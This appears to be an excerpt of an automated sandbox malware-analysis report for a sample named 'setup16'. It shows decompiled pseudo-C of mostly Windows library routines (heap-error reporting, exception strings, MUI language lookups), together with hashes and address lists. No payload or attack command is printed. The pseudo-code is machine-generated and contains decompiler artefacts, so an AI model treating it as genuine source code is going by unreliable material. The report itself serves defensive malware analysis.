                                                                                                                                                                                                        • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041A660(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041AF60( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                                                                                                        0x0041a663
                                                                                                                                                                                                        0x0041a67a
                                                                                                                                                                                                        0x0041a688

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                                                                                                                                                                        • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 284f02c8ae3bddb10a69414161d978cbe1f8174ac5d0bf5c6bb6b9e51a420f61
                                                                                                                                                                                                        • Instruction ID: 4a185f439efa7b86b35ae46590d2038237dad7a0142fa179e6d7516e4653bb1e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 284f02c8ae3bddb10a69414161d978cbe1f8174ac5d0bf5c6bb6b9e51a420f61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80B092B29024D5CAFB11EBB05A08B2B7E04BBD0745F26C562E2020686B4778E091F6B6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 04A7B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • *** enter .cxr %p for the context, xrefs: 04A7B50D
                                                                                                                                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04A7B314
                                                                                                                                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04A7B484
                                                                                                                                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04A7B53F
                                                                                                                                                                                                        • read from, xrefs: 04A7B4AD, 04A7B4B2
                                                                                                                                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 04A7B352
                                                                                                                                                                                                        • <unknown>, xrefs: 04A7B27E, 04A7B2D1, 04A7B350, 04A7B399, 04A7B417, 04A7B48E
                                                                                                                                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04A7B2DC
                                                                                                                                                                                                        • The instruction at %p referenced memory at %p., xrefs: 04A7B432
                                                                                                                                                                                                        • The critical section is owned by thread %p., xrefs: 04A7B3B9
                                                                                                                                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04A7B38F
                                                                                                                                                                                                        • *** then kb to get the faulting stack, xrefs: 04A7B51C
                                                                                                                                                                                                        • Go determine why that thread has not released the critical section., xrefs: 04A7B3C5
                                                                                                                                                                                                        • write to, xrefs: 04A7B4A6
                                                                                                                                                                                                        • *** enter .exr %p for the exception record, xrefs: 04A7B4F1
                                                                                                                                                                                                        • *** Inpage error in %ws:%s, xrefs: 04A7B418
                                                                                                                                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04A7B476
                                                                                                                                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04A7B3D6
                                                                                                                                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04A7B39B
                                                                                                                                                                                                        • The resource is owned shared by %d threads, xrefs: 04A7B37E
                                                                                                                                                                                                        • This failed because of error %Ix., xrefs: 04A7B446
                                                                                                                                                                                                        • The resource is owned exclusively by thread %p, xrefs: 04A7B374
                                                                                                                                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04A7B323
                                                                                                                                                                                                        • a NULL pointer, xrefs: 04A7B4E0
                                                                                                                                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04A7B47D
                                                                                                                                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04A7B2F3
                                                                                                                                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04A7B305
                                                                                                                                                                                                        • an invalid address, %p, xrefs: 04A7B4CF
                                                                                                                                                                                                        • The instruction at %p tried to %s , xrefs: 04A7B4B6
                                                                                                                                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 04A7B48F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                                                                        • API String ID: 0-108210295
                                                                                                                                                                                                        • Opcode ID: 1d46232ca7cb4a028bc8ec7b472b9b21167001a64f61099eae36ac3eb28ef875
                                                                                                                                                                                                        • Instruction ID: 5e78aaff7c6fd85b3d6f335f1b3511bf37319a323c4f59a342629639b1010580
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d46232ca7cb4a028bc8ec7b472b9b21167001a64f61099eae36ac3eb28ef875
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2081F2B5A80210FFEB356B058E49DAB3F36AF86B59F400064F5052B622E371B451DBB6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A81C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                                                        			E04A81C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x49a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E049CB150();
				} else {
					E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4ab589c);
				E049CB150("Heap error detected at %p (heap handle %p)\n",  *0x4ab58a0);
				_t27 =  *0x4ab5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04A81E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E049CB150();
				} else {
					E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E049CB150("Error code: %d - %s\n",  *0x4ab5898);
				_t113 =  *0x4ab58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E049CB150();
					} else {
						E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E049CB150("Parameter1: %p\n",  *0x4ab58a4);
				}
				_t115 =  *0x4ab58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E049CB150();
					} else {
						E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E049CB150("Parameter2: %p\n",  *0x4ab58a8);
				}
				_t117 =  *0x4ab58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E049CB150();
					} else {
						E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E049CB150("Parameter3: %p\n",  *0x4ab58ac);
				}
				_t119 =  *0x4ab58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E049CB150();
					} else {
						E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4ab58b4);
					E049CB150("Last known valid blocks: before - %p, after - %p\n",  *0x4ab58b0);
				} else {
					_t120 =  *0x4ab58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E049CB150();
				} else {
					E049CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E049CB150("Stack trace available at %p\n", 0x4ab58c0);
			}











                                                                                                                                                                                                        0x04a81c10
                                                                                                                                                                                                        0x04a81c16
                                                                                                                                                                                                        0x04a81c1e
                                                                                                                                                                                                        0x04a81c3d
                                                                                                                                                                                                        0x04a81c3e
                                                                                                                                                                                                        0x04a81c20
                                                                                                                                                                                                        0x04a81c35
                                                                                                                                                                                                        0x04a81c3a
                                                                                                                                                                                                        0x04a81c44
                                                                                                                                                                                                        0x04a81c55
                                                                                                                                                                                                        0x04a81c5a
                                                                                                                                                                                                        0x04a81c65
                                                                                                                                                                                                        0x04a81c67
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a81c6e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a81c67
                                                                                                                                                                                                        0x04a81cdc
                                                                                                                                                                                                        0x04a81ce5
                                                                                                                                                                                                        0x04a81d04
                                                                                                                                                                                                        0x04a81d05
                                                                                                                                                                                                        0x04a81ce7
                                                                                                                                                                                                        0x04a81cfc
                                                                                                                                                                                                        0x04a81d01
                                                                                                                                                                                                        0x04a81d0b
                                                                                                                                                                                                        0x04a81d17
                                                                                                                                                                                                        0x04a81d1f
                                                                                                                                                                                                        0x04a81d25
                                                                                                                                                                                                        0x04a81d30
                                                                                                                                                                                                        0x04a81d4f
                                                                                                                                                                                                        0x04a81d50
                                                                                                                                                                                                        0x04a81d32
                                                                                                                                                                                                        0x04a81d47
                                                                                                                                                                                                        0x04a81d4c
                                                                                                                                                                                                        0x04a81d61
                                                                                                                                                                                                        0x04a81d67
                                                                                                                                                                                                        0x04a81d68
                                                                                                                                                                                                        0x04a81d6e
                                                                                                                                                                                                        0x04a81d79
                                                                                                                                                                                                        0x04a81d98
                                                                                                                                                                                                        0x04a81d99
                                                                                                                                                                                                        0x04a81d7b
                                                                                                                                                                                                        0x04a81d90
                                                                                                                                                                                                        0x04a81d95
                                                                                                                                                                                                        0x04a81daa
                                                                                                                                                                                                        0x04a81db0
                                                                                                                                                                                                        0x04a81db1
                                                                                                                                                                                                        0x04a81db7
                                                                                                                                                                                                        0x04a81dc2
                                                                                                                                                                                                        0x04a81de1
                                                                                                                                                                                                        0x04a81de2
                                                                                                                                                                                                        0x04a81dc4
                                                                                                                                                                                                        0x04a81dd9
                                                                                                                                                                                                        0x04a81dde
                                                                                                                                                                                                        0x04a81df3
                                                                                                                                                                                                        0x04a81df9
                                                                                                                                                                                                        0x04a81dfa
                                                                                                                                                                                                        0x04a81e00
                                                                                                                                                                                                        0x04a81e0a
                                                                                                                                                                                                        0x04a81e13
                                                                                                                                                                                                        0x04a81e32
                                                                                                                                                                                                        0x04a81e33
                                                                                                                                                                                                        0x04a81e15
                                                                                                                                                                                                        0x04a81e2a
                                                                                                                                                                                                        0x04a81e2f
                                                                                                                                                                                                        0x04a81e39
                                                                                                                                                                                                        0x04a81e4a
                                                                                                                                                                                                        0x04a81e02
                                                                                                                                                                                                        0x04a81e02
                                                                                                                                                                                                        0x04a81e08
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a81e08
                                                                                                                                                                                                        0x04a81e5b
                                                                                                                                                                                                        0x04a81e7a
                                                                                                                                                                                                        0x04a81e7b
                                                                                                                                                                                                        0x04a81e5d
                                                                                                                                                                                                        0x04a81e72
                                                                                                                                                                                                        0x04a81e77
                                                                                                                                                                                                        0x04a81e95

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                                                                                        • API String ID: 0-2897834094
                                                                                                                                                                                                        • Opcode ID: 2f2c020f0ae98c5243a564b28bb7b813f1a32871034876390adad25d24661536
                                                                                                                                                                                                        • Instruction ID: 626c8213acc0f14f8b56c2528975a0087ce4336be8bbea5cd9d0705316413409
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f2c020f0ae98c5243a564b28bb7b813f1a32871034876390adad25d24661536
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF61E432A10244DFEA11BB84E585EB073F8EB54A34B09843EF44A5B311E674FC529F8A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E049D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E049D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E049D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E049D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E049D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E049D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L049E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04A0F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04A11370(_t276, 0x49a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04A0BB40(0,  &_v68, _t170);
									if(L049D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04A0BB40(_t257,  &_v68, _t243);
								if(L049D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04A11370(_t278, 0x49a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L049E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04A0F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04A11370(_v16, 0x49a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04A0BB40(_t262,  &_v68, _t244);
								if(L049D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04A11370(_t282, 0x49a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04A0BB40(_t262,  &_v68, _t201);
							if(L049D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L049E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04A0F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04A11370(_t280, 0x49a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04A0BB40(_t267,  &_v68, _t245);
							if(L049D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04A11370(_t284, 0x49a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04A0BB40(_t267,  &_v68, _t224);
						if(L049D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                                                                                        0x049d3d3c
                                                                                                                                                                                                        0x049d3d42
                                                                                                                                                                                                        0x049d3d44
                                                                                                                                                                                                        0x049d3d46
                                                                                                                                                                                                        0x049d3d49
                                                                                                                                                                                                        0x049d3d4c
                                                                                                                                                                                                        0x049d3d4f
                                                                                                                                                                                                        0x049d3d52
                                                                                                                                                                                                        0x049d3d55
                                                                                                                                                                                                        0x049d3d58
                                                                                                                                                                                                        0x049d3d5b
                                                                                                                                                                                                        0x049d3d5f
                                                                                                                                                                                                        0x049d3d61
                                                                                                                                                                                                        0x049d3d66
                                                                                                                                                                                                        0x04a28213
                                                                                                                                                                                                        0x04a28218
                                                                                                                                                                                                        0x049d4085
                                                                                                                                                                                                        0x049d4088
                                                                                                                                                                                                        0x049d408e
                                                                                                                                                                                                        0x049d4094
                                                                                                                                                                                                        0x049d409a
                                                                                                                                                                                                        0x049d40a0
                                                                                                                                                                                                        0x049d40a6
                                                                                                                                                                                                        0x049d40a9
                                                                                                                                                                                                        0x049d40af
                                                                                                                                                                                                        0x049d40b6
                                                                                                                                                                                                        0x049d40bd
                                                                                                                                                                                                        0x049d40bd
                                                                                                                                                                                                        0x049d3d83
                                                                                                                                                                                                        0x04a2821f
                                                                                                                                                                                                        0x04a28229
                                                                                                                                                                                                        0x04a28238
                                                                                                                                                                                                        0x04a28238
                                                                                                                                                                                                        0x04a2823d
                                                                                                                                                                                                        0x04a2823d
                                                                                                                                                                                                        0x049d3da0
                                                                                                                                                                                                        0x049d3daf
                                                                                                                                                                                                        0x049d3db5
                                                                                                                                                                                                        0x049d3dba
                                                                                                                                                                                                        0x049d3dba
                                                                                                                                                                                                        0x049d3dd4
                                                                                                                                                                                                        0x049d3e94
                                                                                                                                                                                                        0x049d3eab
                                                                                                                                                                                                        0x049d3f6d
                                                                                                                                                                                                        0x049d3f84
                                                                                                                                                                                                        0x049d406b
                                                                                                                                                                                                        0x049d406b
                                                                                                                                                                                                        0x049d406e
                                                                                                                                                                                                        0x049d406e
                                                                                                                                                                                                        0x049d4070
                                                                                                                                                                                                        0x049d4074
                                                                                                                                                                                                        0x04a28351
                                                                                                                                                                                                        0x04a28351
                                                                                                                                                                                                        0x049d407a
                                                                                                                                                                                                        0x049d407f
                                                                                                                                                                                                        0x04a2835d
                                                                                                                                                                                                        0x04a28370
                                                                                                                                                                                                        0x04a28377
                                                                                                                                                                                                        0x04a28379
                                                                                                                                                                                                        0x04a2837c
                                                                                                                                                                                                        0x04a2837c
                                                                                                                                                                                                        0x04a2835d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d407f
